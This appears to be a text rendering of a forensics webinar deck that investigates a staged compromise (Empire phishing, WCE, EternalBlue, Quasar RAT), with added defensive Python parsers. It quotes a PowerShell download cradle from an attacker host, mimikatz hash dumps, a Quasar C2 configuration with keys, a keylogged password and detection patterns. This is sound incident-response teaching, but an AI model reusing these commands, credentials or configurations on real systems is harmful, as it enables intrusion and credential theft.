ptsecurity.com
Incident investigation: examination and analysis
Денис Гойденко, Александр Григорян
Experts, Positive Technologies Expert Security Center
PT Expert Security Center
Threat Intelligence: 50+ groups tracked
Incident Response: 50+ investigations a year
Network Security: 5000+ network signatures
Expertise feeds into the products
Webinar plan
THEORY: What forensics is; Generalising the process; When to apply it; Where to look; About the contest
PRACTICE: Where to start the analysis; Artifacts; Tools; Analysing non-formalisable data; Reverse engineering
SUMMARY: Normalising the data; Identifying the key events; Defining indicators
THEORY
What forensics is
Forensics = forensic (court) science
FORENSIC science = the science of examining evidence
+ computer = COMPUTER FORENSICS
COLLECTION -> EXAMINATION -> ANALYSIS -> REPORTING
Source -> Data -> Information -> Evidence
Guide to Integrating Forensic Techniques into Incident Response: nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-86.pdf
As a diagram
Raw artifacts -> Artifacts after parsing -> Artifacts after filtering and normalisation -> Indicator of compromise
When to apply it
• Responding to security incidents,
• Investigating security incidents,
• Finding the causes of technical incidents,
• Monitoring,
• Data recovery,
• Data collection,
• Regulatory compliance
Where to look
RAM | PERSISTENT STORAGE | NETWORK TRAFFIC
OPERATING SYSTEMS: OS Windows, OS *nix, Mac OS, iOS, Android, Specialized
APPLICATIONS (one application box under each operating system in the figure)
Persistent storage
• SPI Flash
• HDD
• USB Flash/HDD
• Flash cards (MMC/SD/xD etc.)
• CD/DVD
• Backup tape
Figure: raw bits -> files (file1.exe, file2.evtx, file3.pf, file4.dll, file1.fil, fragmented.file, …) -> artifact categories (User Activity, Program Execution, Lateral Movement, Exploitation, …)
RAM
Figure: raw bits -> Page Tables, Page Directories, … -> kernel objects (_FILE_OBJECT, _EPROCESS, _OBJECT_SYMBOLIC_LINK, _TOKEN, _ETHREAD, …)
Network traffic
Figure: raw bits -> packets -> sublayer field data
How to collect
People: system administrators, users, managers
Technical means: Online/Offline, Virtual Images, RAM Dump
Information about the security controls in place
Logical network map
Physical network map
Information about users
Information about the technical implementation of processes
Information about key events in the organisation
Information about security policies
Information about business processes
How to collect: technical means
Online:
• Raw access to locked files
• Native tools (cmd/PS/bash)
• FastIR
• Onsite parsing / only collect
• Mozilla MIG
• GRR
• Velociraptor
Offline:
• Physical write blockers
• OS-level write blockers
• A set of adapters
• Live Media
• A set of screwdrivers
• HDD adapter
• SATA cable
• TAP
• EWF
Virtual machines:
• *.vmem
• *.vmsn/*.vmss
• VBox: vboxmanage --dbg, vboxdump.py
• QEMU – virsh
• Xen/KVM – libvmi
• Hyper-V – vm2dmp
RAM Dump:
• Not the system drive
• F-Response
• Memoryze
• FTK Imager
• EnCase
• Belkasoft RAM Capturer
• Winpmem
• Hardware (1394)
About the contest
Bot server, File server, Compromised hosts, Contestant
Data, Brief, Evidences
Much Money website: web.archive.org/web/20190408082359/http://muchmoney.ga/
About Much Money
PRACTICE
Examination: input data
My boss said someone sent letters to our office in Bangladesh with invoices to
pay for someone else’s bill. And the guys from bangladesh sent the money.
Also, the data from our knowledge base and the history of all transactions on
operations are missing. Something strange is also happening with the site, the
administrator cannot enter the administration panel. I need help with forensics.
I took images from hosts and servers. I can give you listings of files from these
images, for which I will give you files that you request. I just need to know the
MD5 file hash and I’ll give you a download link.
• So what actually happened?
• Can you tell me more about the incident?
• How can I help you?
Letters | Knowledge base | Transaction history | Website
Examination: letters
+ LECmd = "opened it, but it didn't work":
Files list:
OfficeMalScanner: www.reconstructer.org/OfficeMalScanner
LECmd: ericzimmerman.github.io/LECmd
Examination: static analysis
olevba.py
7z.exe
oledir.py
Oletools: www.decalage.info/python/oletools
Examination: static analysis
Unpacked result.docx: app.xml
Examination: static analysis
deBase64
The <Company> property
deBase64
Empire identification
Examination: sandbox
Suricata PT Open Ruleset: github.com/ptresearch/AttackDetection/blob/master/PowerShell%20Empire/power_shell_empire.rules
Examination: Empire functionality (persistence):
NTUSER.DAT: Software\Microsoft\Windows\CurrentVersion
NTUSER.DAT: Software\Microsoft\Windows\CurrentVersion\Run
deBase64:
Examination
…but the administrator succeeded
Difference between the listing and $MFT
"opened it, but it didn't work":
Examination: looking at the temp folder listing
Breadth / Depth
Working with indicators:
• a list of hashes
• a list of names
The hacker's working folder is temp; widen the search:
lateral movement
wce.exe
logging
psexec.exe
ADMIN PC
Examination
The hacker's working folder is TEMP; examining its contents:
ALL PC
HoboCopy, TeamViewer, WCE
• Phishing
• Macros (VBS)
• Archiving (7z, Rar)
• Remote control, CLI (Empire, psexec)
• Remote control, GUI (TV, AmmyyAdmin, rdp)
• Credential dumping (WCE)
• Scripting (PS, cmd)
• Copying locked files
+ DC, BOSS hosts
Wce: github.com/xymnal/wce
EmpireProject: github.com/EmpireProject/Empire
TeamViewer: www.teamviewer.com/
HoboCopy: github.com/candera/hobocopy
AmmyyAdmin: www.ammyy.com/
Examination: the hacker's TEMP working folder on ALL hosts (the earliest wce):
DC PC
wce.bat wce
Examination: the hacker's TEMP working folder:
DC PC
launcher1.bat BOSS PC
BOSS PC SYSTEM registry hive:
Proxy to 34.238.235.73:80
Some TV, Ammyy, reg-work(secr), static password on TV
Examination: searching all locations of the known IOCs -> a new folder:
BOSS PC
We see the result of running WebHistoryPass:
Examination: BOSS PC
PECmd.exe – prefetch timeline
Viewing documents
Launch of WebHistoryPass
Which documents were opened?
PECmd: https://ericzimmerman.github.io/
Examination: BOSS PC
JLECmd.exe
OSFMount
Empty
Free space:
R.saver
JLECmd: ericzimmerman.github.io/
Examination: BOSS PC
The same CnC
USB attack vector:
Examination: BOSS PC
Letters:
Collecting the letters:
Bangladesh: Fake:
ATT&CK Matrix
Initial Access: Spearphishing Attachment; Phishing Through Removable Storage
Execution: Command-Line Interface; Graphical User Interface; PowerShell; Scripting; Third-party Software; Trusted Developer Utilities; Windows Management Instrumentation; Windows Remote Management
Persistence: Accessibility Features; Registry Run Keys / Startup Folder
Privilege Escalation: Accessibility Features; Bypass User Account Control
Defense Evasion: Obfuscated Files or Information
Credential Access: Account Manipulation; Credential Dumping; Credentials in Files; Network Sniffing
Discovery: Browser Bookmark Discovery; File and Directory Discovery; Network Service Scanning; Network Share Discovery; Query Registry
Lateral Movement: Remote Desktop Protocol; Remote File Copy; Remote Services; Third-party Software; Windows Admin Shares; Windows Remote Management
Collection: Data from Local System; Data from Network Shared Drive; Email Collection
Exfiltration: Data Compressed; Data Encrypted; Exfiltration Over Alternative Protocol; Exfiltration Over Command and Control Channel
Command and Control: Commonly Used Port; Connection Proxy; Data Encoding; Remote Access Tools; Remote File Copy; Standard Application Layer Protocol; Standard Cryptographic Protocol
Impact: Stored Data Manipulation
ATT&CK Matrix for Enterprise: attack.mitre.org/
CASE 2
Examination: input data (the same brief as in case 1)
On the server WIN2003 there used to be a system for processing trade transactions, on which the transaction history was kept. They represent a folder with documents in recent years. The entire transaction archive is missing. We need them for further research.
This is old transaction server. We lost all transactions from it.
Exploit EternalBlue: khalil-shreateh.com/khalil.shtml/it-highlights/8966-Microsoft-Windows-EternalBlue-SMB-Remote-Code-Execution--.html
MFT record for pwned.txt (one CSV row of the MFT parser's output, wrapped on the slide):
14809,5,True,5,5,.,pwned.txt,.txt,0,1,,False,False,False,False,False,False,Archive,DosWindows,28.03.2019 08:51:33,,28.03.2019 14:14:03,28.03.2019 08:51:33,28.03.2019 14:14:03,28.03.2019 08:51:33,28.03.2019 14:14:03,28.03.2019 08:51:33,0,387888150,466,,,
MFT parser: github.com/EricZimmerman/MFT
Windows Forensic Analysis: www.sans.org/security-resources/posters/windows-forensic-analysis/170/download
Path LastModifiedTimeUTC
C:\Documents and Settings\Administrator\Application Data\services\sd.exe 15.04.2019 13:24
C:\Documents and Settings\Administrator\Application Data\services\r.exe 15.04.2019 13:18
C:\Documents and Settings\Administrator\Application Data\services\7.exe 15.04.2019 12:28
C:\Documents and Settings\Administrator\Application Data\services\update.exe 15.04.2019 12:18
C:\Documents and Settings\Administrator\Application Data\services\ms.exe 29.03.2019 5:43
C:\Documents and Settings\Administrator\Application Data\services\gs.exe 29.03.2019 5:22
C:\Documents and Settings\Administrator\Application Data\services\kiwi start.bat 29.03.2019 5:03
C:\Documents and Settings\tsokihata\Local Settings\Temp\1\RuXNoMXqqKbW.bat 28.03.2019 20:14
C:\Documents and Settings\tsokihata\Local Settings\Temp\1\RuXNoMXqqKbW.bat 28.03.2019 20:14
C:\Documents and Settings\Administrator\Local Settings\Temp\XmwvDMRXMe3R.bat 28.03.2019 20:14
C:\Documents and Settings\Administrator\Local Settings\Temp\XmwvDMRXMe3R.bat 28.03.2019 20:14
C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\spoolsvc_x86.exe 28.03.2019 14:14
C:\Documents and Settings\tsokihata\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\tsokihata\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\spoolsvc_x86.exe 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\m.exe 28.03.2019 13:25
Application Compatibility Cache
AppCompatCacheParser: ericzimmerman.github.io/
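Added example (mine, not from the deck and not output of AppCompatCacheParser): a Python script that turns a Path / LastModifiedTimeUTC listing like the one above into the normalised timeline the deck's summary section asks for. It de-duplicates the repeated rows, sorts them oldest first and flags paths a server should not be executing from, so the earliest flagged row is the candidate first malicious execution. The sample rows are constructed from the slide plus one benign system binary; the flagging heuristics are my own.

```python
import re
from datetime import datetime

# Constructed sample in the Path / LastModifiedTimeUTC shape shown on the slide
# (rows taken from the slide plus one benign system binary for contrast).
SAMPLE_LISTING = """\
C:\\Documents and Settings\\Administrator\\Application Data\\services\\sd.exe 15.04.2019 13:24
C:\\Documents and Settings\\Administrator\\Application Data\\services\\kiwi start.bat 29.03.2019 5:03
C:\\Documents and Settings\\tsokihata\\Local Settings\\Temp\\1\\RuXNoMXqqKbW.bat 28.03.2019 20:14
C:\\Documents and Settings\\tsokihata\\Local Settings\\Temp\\1\\RuXNoMXqqKbW.bat 28.03.2019 20:14
C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\spoolsvc_x86.exe 28.03.2019 14:14
C:\\Documents and Settings\\Administrator\\Application Data\\services\\spoolsvc.exe 28.03.2019 14:14
C:\\Documents and Settings\\Administrator\\Application Data\\services\\m.exe 28.03.2019 13:25
C:\\WINDOWS\\system32\\notepad.exe 14.04.2008 12:00
"""

# One row: everything before the trailing "dd.mm.yyyy H:MM" is the path (paths may contain spaces).
ROW_RE = re.compile(r"^(?P<path>.+) (?P<ts>\d{2}\.\d{2}\.\d{4} \d{1,2}:\d{2})$")

# Heuristics (my own, not the tool's): locations a server should not be executing from.
SUSPICIOUS_LOCATIONS = [
    (re.compile(r"\\Application Data\\.+\.(exe|dll|bat|cmd)$", re.I),
     "binary or script under a user profile's Application Data"),
    (re.compile(r"\\Local Settings\\Temp\\.+\.(exe|dll|bat|cmd|ps1)$", re.I),
     "binary or script in a Temp folder"),
    (re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I),
     "Startup-folder persistence"),
]


def parse_listing(text):
    """Parse the listing into a de-duplicated list of (datetime, path), oldest first."""
    entries = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Path "):
            continue  # skip blank lines and the column header
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        ts = datetime.strptime(m.group("ts"), "%d.%m.%Y %H:%M")
        entries.add((ts, m.group("path")))
    return sorted(entries)


def reasons_for(path):
    """Return the heuristic labels that apply to a path (empty list if none)."""
    return [label for rx, label in SUSPICIOUS_LOCATIONS if rx.search(path)]


def build_timeline(text):
    """Normalised timeline: one dict per unique row, with the heuristics that fired."""
    return [{"time": ts, "path": path, "reasons": reasons_for(path)}
            for ts, path in parse_listing(text)]


def key_events(text):
    """Only the rows that tripped a heuristic, oldest first."""
    return [e for e in build_timeline(text) if e["reasons"]]


def earliest_key_event(text):
    """The candidate first malicious execution on the host, or None."""
    events = key_events(text)
    return events[0] if events else None


if __name__ == "__main__":
    for e in key_events(SAMPLE_LISTING):
        print(e["time"].strftime("%Y-%m-%d %H:%M"), e["path"], "<-", "; ".join(e["reasons"]))
```

The same parse/flag/sort loop works for the PECmd and JLECmd outputs used later in the deck once the row regex is adapted to their column layout; the point is that every source is reduced to (time, path, reasons) before the timelines from different hosts are merged.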
Microsoft wireless secrets:
No interfaces found
MUCHMONEY\tsokihata::8c528bc80d45f1e2b0d3662b97ebed58:5363dec787f9df3c135e551c92a0ec1d:::
MUCHMONEY\WIN2003$::00000000000000000000000000000000:e16033eeebfe3bed02e7084d72efa727:::
WIN2003\Administrator::c33eb318664f594a8d989d02e7f332d1:f3c6489a9ab82faf5ff959c97d7a4d40:::
MUCHMONEY\WIN2003$::00000000000000000000000000000000:e16033eeebfe3bed02e7084d72efa727:::
Administrator(current):500:c33eb318664f594a8d989d02e7f332d1:f3c6489a9ab82faf5ff959c97d7a4d40:::
ASPNET(current):1003:aad3b435b51404eeaad3b435b51404ee:9344f0479b9974e2add04e93904fd248:::
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0(current):1001:aad3b435b51404eeaad3b435b51404ee:1e5697ec0b1a1b89fc429fa23327d8f4:::
mimikatz # lsadump::sam
Domain : WIN2003
SysKey : 362bc4a7806ee94ebfee8cb009c35ab5
Local SID : S-1-5-21-3089925616-1146513134-864702280
SAMKey : 8dbeb822499a12e3f6b99845677bcd11
RID : 000001f4 (500)
User : Administrator
Hash LM : c33eb318664f594a8d989d02e7f332d1
Hash NTLM: f3c6489a9ab82faf5ff959c97d7a4d40
RID : 000001f5 (501)
User : Guest
RID : 000003e9 (1001)
User : SUPPORT_388945a0
Hash NTLM: 1e5697ec0b1a1b89fc429fa23327d8f4
RID : 000003eb (1003)
User : ASPNET
Hash NTLM: 9344f0479b9974e2add04e93904fd248
lm - 0: 32dc9a9cc3912c522c2a1857bd9eefce
ntlm- 0: 9344f0479b9974e2add04e93904fd248
VirusTotal: www.virustotal.com/gui/file/4ceb14edd4a681997c99255b3b4895c0012a735e5f4ac0323e9c97f102ad5725/detection
Interactive Online Malware Analysis Sandbox: app.any.run/tasks/d49fb8b5-3da4-4f65-9706-b5a5e40968ce
Malware Initial Assessment: www.winitor.com/get.html
Quasar RAT
"Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you."
Features: Compressed (QuickLZ) & Encrypted (TLS), Task Manager, File Manager, Remote Desktop, Remote Shell, Download & Execute, Upload & Execute, System Information, Keylogger (Unicode Support), Reverse Proxy (SOCKS5), Registry Editor
Remote Administration Tool for Windows: github.com/quasar/QuasarRAT
Downeks and Quasar RAT Used in Recent Targeted Attacks Against Governments: unit42.paloaltonetworks.com/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/
Operation Cloud Hopper: www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
Analysis Report (AR18-352A): www.us-cert.gov/ncas/analysis-reports/AR18-352A
APT10 – Quasar RAT analysis: www.immersivelabs.com/2019/01/29/apt10-quasar-rat-analysis/
Settings of the Quasar client as found in the sample:
AES.SetDefaultKey("RoMfNZtSSIpcpGyRmEXa");
string a = AES.Decrypt("AatyrR7530jcEddqQ+/COFF8FXAxIWDi3E7SZf5FbWOk6kqERYpeylucj5ccrULb9ZFIw20J9vcTIbYe3BZwUbi2TE12nCa9aDyWX3E8Pj8=");
Console.WriteLine(a);
string Version = "1.3.0.0";
string Hosts = "muchm0ney.tk:80;";
int RECONNECTDELAY = 300;
string KEY = "GLfNNklGizWZMlHMlK+j9Q==";
string AUTHKEY = "z6kGPShxpE3GZdg5i2bKweS/wNopLz+fTdJO0JZ6cWWkmrDhJ1vwaKqHuO/FdXrNnoUKbnTlgeODYPpdm5cKEg==";
Environment.SpecialFolder SPECIALFOLDER = Environment.SpecialFolder.ApplicationData;
string DIRECTORY = Environment.GetFolderPath(SPECIALFOLDER);
string SUBDIRECTORY = "services";
string INSTALLNAME = "spoolsvc.exe";
bool HideSubDirectory = true;
bool HideFile = true;
string Mutex = "QSR_MUTEX_muchm0ney";
string RegistryName = "Windows Printer Spool Service";
bool HIDEFILE = true;
bool ENABLELOGGER = true;
string ENCRYPTIONKEY = "RoMfNZtSSIpcpGyRmEXa";
string TAG = "muchm0ney";
string LOGDIRECTORYNAME = "Logs";
bool HIDELOGDIRECTORY = true;
bool HIDEINSTALLSUBDIRECTORY = true;
AES.SetDefaultKey("RoMfNZtSSIpcpGyRmEXa", "z6kGPShxpE3GZdg5i2bKweS/wNopLz+fTdJO0JZ6cWWkmrDhJ1vwaKqHuO/FdXrNnoUKbnTlgeODYPpdm5cKEg==");
string l = AES.ReadLogFile(".\\Logs\\03-29-2019");
04-16-2019
Decrypted keylogger log (HTML):
<p class="h">
<br>
<br>[<b>Connect to dc0.muchmoney.ga - 11:36</b>]</p>
<br>muchmoney.ga\tsokihata
<p class="h">[Tab]</p>Kur0$@w@
<p class="h">[Enter]</p>
<br>
<p class="h">
Network forensics
alert tcp $EXTERNAL_NET :1024 -> $HOME_NET any (msg:"Non-Std TCP Server Traffic contains '|40 00 00 00|' (Quasar RAT Initial Packet)"; sid:10000; rev:1; flow:established,from_server; dsize:68; content:"|40 00 00 00|"; depth:4; fast_pattern;)
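What the rule above actually tests is easy to lose in the Suricata syntax, so here is an added Python example (mine; not from the deck and not part of the PT ruleset) that parses the rule's option block, decodes the |hex| content into bytes and applies the flow direction, dsize and depth keywords to constructed payloads: a Quasar-style first frame (a 4-byte little-endian length of 64 followed by 64 bytes, 68 bytes in total) in both directions, an unrelated 68-byte HTTP response and a 72-byte frame. Only the server-to-client Quasar frame alerts. The parser covers just the keywords this rule uses.

```python
import re
import struct

# The rule from the slide (PT Open Ruleset), joined onto one line.
RULE_TEXT = (
    'alert tcp $EXTERNAL_NET :1024 -> $HOME_NET any '
    '(msg:"Non-Std TCP Server Traffic contains \'|40 00 00 00|\' (Quasar RAT Initial Packet)"; '
    'sid:10000; rev:1; flow:established,from_server; dsize:68; '
    'content:"|40 00 00 00|"; depth:4; fast_pattern;)'
)

# option;   or   option:value;   where value may be a double-quoted string
OPTION_RE = re.compile(r'(\w+)(?::("(?:[^"\\]|\\.)*"|[^;]*))?;')


def parse_options(rule_text):
    """Return the option block as {name: value}; valueless options map to ''."""
    body = rule_text[rule_text.index("(") + 1:rule_text.rindex(")")]
    options = {}
    for name, value in OPTION_RE.findall(body):
        options[name] = value[1:-1] if value.startswith('"') else value.strip()
    return options


def decode_content(spec):
    """Turn a Suricata content string into bytes: text as-is, |..| sections as hex."""
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def rule_matches(options, payload, from_server):
    """Apply flow direction, dsize, content and depth to a single TCP payload."""
    flow = set(options.get("flow", "").split(","))
    if "from_server" in flow and not from_server:
        return False
    if "to_server" in flow and from_server:
        return False
    if "dsize" in options and len(payload) != int(options["dsize"]):
        return False  # dsize is the exact payload length, not a minimum
    if "content" in options:
        pattern = decode_content(options["content"])
        depth = int(options["depth"]) if "depth" in options else len(payload)
        if pattern not in payload[:depth]:
            return False  # depth limits how far into the payload content may match
    return True


def scan(options, flows):
    """flows: list of (label, payload, from_server); return the labels that alert."""
    return [label for label, payload, from_server in flows
            if rule_matches(options, payload, from_server)]


# Constructed samples. Quasar's first frame is a 4-byte little-endian length prefix
# (64 = 0x40) followed by 64 bytes, 68 bytes in total; the rest are non-matching controls.
QUASAR_HELLO = struct.pack("<I", 64) + bytes(range(64))
SAMPLE_FLOWS = [
    ("server->client quasar hello", QUASAR_HELLO, True),
    ("client->server quasar hello", QUASAR_HELLO, False),
    ("server->client 68 bytes of HTTP",
     b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n".ljust(68, b" "), True),
    ("server->client 72-byte frame", struct.pack("<I", 68) + bytes(68), True),
]

if __name__ == "__main__":
    opts = parse_options(RULE_TEXT)
    print("sid", opts["sid"], "alerts on:", scan(opts, SAMPLE_FLOWS))
```

The exact dsize is what keeps this rule quiet on ordinary length-prefixed protocols: a frame whose prefix says 64 but whose payload is not exactly 68 bytes on the wire does not alert, which is also why the rule needs the Quasar client to be the one sending a fixed-size hello.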
![Page 55](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/55.jpg)
![Page 56](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/56.jpg)
![Page 57](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/57.jpg)
![Page 58](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/58.jpg)
![Page 59](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/59.jpg)
![Page 60](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/60.jpg)
PwIntercept
Password Filter DLL: docs.microsoft.com/en-us/windows/win32/secmgmt/installing-and-registering-a-password-filter-dll
Windows credential theft: Methods and mitigations: citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.1032.2458&rep=rep1&type=pdf
THE PROJECTSAURON APT: media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
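What the PwIntercept slide points at is a password filter: a DLL listed in the `Notification Packages` REG_MULTI_SZ under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, which LSA loads and hands every cleartext password change to (the Microsoft link above describes the registration; ProjectSauron used the same mechanism). On an offline image the quickest check is to export that key and compare the list against the DLLs Windows registers itself. The parser below is an added example, not code from the slides: it reads a `reg export` file, decodes the hex(7) form (UTF-16LE, NUL-separated) that REG_MULTI_SZ takes in a .reg file, including backslash-continued lines, and reports entries outside a known set. The sample export is constructed; the known-filter set (scecli everywhere, rassfm on domain controllers) is my assumption.

```python
import re

# Constructed sample: `reg export` of the Lsa key from a host where the
# default scecli filter has been joined by a second DLL. The name
# "PwIntercept" is the one the slide uses; the hex bytes are my own
# UTF-16LE encoding of "scecli\0PwIntercept\0\0" in .reg REG_MULTI_SZ form.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,00,00
"Notification Packages"=hex(7):73,00,63,00,65,00,63,00,6c,00,69,00,00,00,50,00,\
  77,00,49,00,6e,00,74,00,65,00,72,00,63,00,65,00,70,00,74,00,00,00,00,00
"Bounds"=hex:00,30,00,00,00,20,00,00
"""

# Filters Windows registers itself (assumption: scecli everywhere, rassfm on
# domain controllers); anything else deserves a look at the DLL on disk.
KNOWN_FILTERS = {"scecli", "rassfm"}

_VALUE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')


def parse_reg_export(text):
    """Return {key_path: {value_name: value}} for REG_SZ, REG_MULTI_SZ and
    REG_BINARY values of a .reg export, joining backslash-continued lines."""
    keys, key = {}, None
    lines = iter(text.splitlines())
    for line in lines:
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            keys[key] = {}
            continue
        m = _VALUE.match(line)
        if not m or key is None:
            continue
        data = m["data"]
        while data.rstrip().endswith("\\"):  # value continued on the next line
            data = data.rstrip()[:-1] + next(lines, "").strip()
        if data.startswith("hex(7):"):       # REG_MULTI_SZ: UTF-16LE, NUL-separated
            raw = bytes.fromhex(data[len("hex(7):"):].replace(",", ""))
            keys[key][m["name"]] = [s for s in raw.decode("utf-16-le").split("\0") if s]
        elif data.startswith("hex:"):        # REG_BINARY
            keys[key][m["name"]] = bytes.fromhex(data[len("hex:"):].replace(",", ""))
        elif data.startswith('"'):           # REG_SZ
            keys[key][m["name"]] = data[1:-1].replace("\\\\", "\\")
    return keys


def suspicious_password_filters(keys):
    """Entries of Lsa\\Notification Packages that are not a known Windows filter."""
    lsa = keys.get(r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa", {})
    return [p for p in lsa.get("Notification Packages", []) if p.lower() not in KNOWN_FILTERS]
```

A name in that list is resolved from System32, so the follow-up is to hash the DLL, check its signature and look for an exported PasswordChangeNotify that writes somewhere it should not.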
![Page 61](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/61.jpg)
EVT Log
Attempt to install service
{
  "Source": "Security",
  "EventID": 601,
  "EventType": 8,
  "Computer": "WIN2003",
  "NumStrings": 8,
  "SID": "S-1-5-18",
  "TimeGenerated": "2019-03-28T06:17:29+00:00",
  "Strings": [
    "KUqy",
    "powershell -command (new-object System.Net.WebClient).DownloadFile('http://muchm0ney.tk/spoolsvc.exe', 'C:\\wmpub\\mwiislog\\spoolsvc.exe'",
    "16",
    "2",
    "LocalSystem",
    "ANONYMOUS LOGON",
    "NT AUTHORITY",
    "(0x0,0x41D63)"
  ],
  "RecordNumber": "4476",
  "TimeWritten": 1553753849
}
Parse::EventLog: https://metacpan.org/pod/Parse::EventLog
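Event 601 in a Windows 2003 Security log is "Attempt to install service" (4697 on Vista and later), and Parse::EventLog returns its eight insertion strings positionally in the order shown: service name, image path, type, start type, account, installing user, domain, logon ID. Read that way the record above says a service named KUqy whose image is a PowerShell download cradle was installed by ANONYMOUS LOGON, which is what remote service creation over a null session looks like from the target. The script below is an added example, not from the slides or from Parse::EventLog: it maps the strings to fields, flags interpreters and download cradles as service images and anonymous installers, and checks that TimeGenerated and TimeWritten agree (a cheap sanity check against mis-converted or tampered timestamps). The two sample records are constructed; the first mirrors the slide and the second is a benign install for contrast.

```python
import json
import re
from datetime import datetime, timezone

# Constructed sample: two Windows 2003 Security records in the shape
# Parse::EventLog emits. The first mirrors the slide's event 601; the
# second is a benign service install added for contrast.
SAMPLE_RECORDS = json.loads(r'''[
{"Source": "Security", "EventID": 601, "EventType": 8, "Computer": "WIN2003",
 "NumStrings": 8, "SID": "S-1-5-18", "TimeGenerated": "2019-03-28T06:17:29+00:00",
 "Strings": ["KUqy",
  "powershell -command (new-object System.Net.WebClient).DownloadFile('http://muchm0ney.tk/spoolsvc.exe','C:\\wmpub\\mwiislog\\spoolsvc.exe')",
  "16", "2", "LocalSystem", "ANONYMOUS LOGON", "NT AUTHORITY", "(0x0,0x41D63)"],
 "RecordNumber": "4476", "TimeWritten": 1553753849},
{"Source": "Security", "EventID": 601, "EventType": 8, "Computer": "WIN2003",
 "NumStrings": 8, "SID": "S-1-5-18", "TimeGenerated": "2019-03-28T05:00:00+00:00",
 "Strings": ["VBoxService", "C:\\Windows\\system32\\VBoxService.exe",
  "16", "2", "LocalSystem", "Administrator", "WIN2003", "(0x0,0x3E7)"],
 "RecordNumber": "4470", "TimeWritten": 1553749200}
]''')

# Event 601 ("Attempt to install service") carries eight insertion strings in
# this fixed order; Parse::EventLog hands them back positionally.
FIELDS_601 = ("service_name", "image_path", "service_type", "start_type",
              "account", "user", "domain", "logon_id")

# Interpreters and download cradles that have no business being a service image.
SUSPICIOUS_IMAGE = re.compile(
    r"powershell|cmd(\.exe)?\s|rundll32|regsvr32|mshta|[wc]script|"
    r"downloadfile|downloadstring|frombase64string|invoke-expression|\biex\b",
    re.I)


def decode_601(rec):
    if rec.get("EventID") != 601 or len(rec.get("Strings", [])) < 8:
        return None
    return dict(zip(FIELDS_601, rec["Strings"][:8]))


def timestamp_skew(rec):
    """Seconds between TimeGenerated (ISO 8601) and TimeWritten (epoch)."""
    generated = datetime.fromisoformat(rec["TimeGenerated"])
    written = datetime.fromtimestamp(rec["TimeWritten"], tz=timezone.utc)
    return abs((written - generated).total_seconds())


def triage(records, max_skew=5):
    findings = []
    for rec in records:
        svc = decode_601(rec)
        if svc is None:
            continue
        reasons = []
        if SUSPICIOUS_IMAGE.search(svc["image_path"]):
            reasons.append("interpreter or download cradle as service image")
        if svc["user"].upper() == "ANONYMOUS LOGON":
            reasons.append("installed over a null session (ANONYMOUS LOGON)")
        if timestamp_skew(rec) > max_skew:
            reasons.append("TimeGenerated/TimeWritten disagree")
        if reasons:
            findings.append({"record": rec["RecordNumber"], "computer": rec["Computer"],
                             "service": svc["service_name"], "image": svc["image_path"],
                             "reasons": reasons})
    return findings
```

The same mapping applies to 4697 with different string positions, so keep the field table per event ID rather than hard-coding offsets in the checks.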
![Page 62](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/62.jpg)
18.222.249.59 3389 29.03.2019 8:04
RDP-screenshotter: https://github.com/zer0-t/RDP-screenshotter/blob/master/RDP-screenshotter.sh
![Page 63](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/63.jpg)
Analysis: update.exe
strings: golang
IDA: Need main
![Page 64](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/64.jpg)
Analysis: update.exe
GoUtils: gitlab.com/zaytsevgu/GoUtils2.0/
main_main
![Page 65](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/65.jpg)
Analysis: update.exe
some bytes
XOR
